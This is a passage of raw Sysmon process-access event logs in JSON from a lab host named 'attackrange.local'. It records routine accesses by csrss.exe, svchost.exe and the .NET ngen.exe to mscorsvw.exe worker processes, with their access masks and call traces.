ramework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7397,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.210\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-00101D6D0D00}\r\nTargetProcessId: 4716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.210","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-00101D6D0D00}","TargetProcessId":"4716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7398,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.210\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-00101D6D0D00}\r\nTargetProcessId: 4716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.210","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-00101D6D0D00}","TargetProcessId":"4716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7399,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.257\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010F3700D00}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.257","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010F3700D00}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7400,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.257\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010F3700D00}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.257","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010F3700D00}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7401,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.257\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-0010F3700D00}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.257","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-0010F3700D00}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7402,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.288\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001039740D00}\r\nTargetProcessId: 4040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.288","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001039740D00}","TargetProcessId":"4040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7403,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.288\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001039740D00}\r\nTargetProcessId: 4040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.288","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001039740D00}","TargetProcessId":"4040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7404,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:40.288\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001039740D00}\r\nTargetProcessId: 4040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:40.288","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001039740D00}","TargetProcessId":"4040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
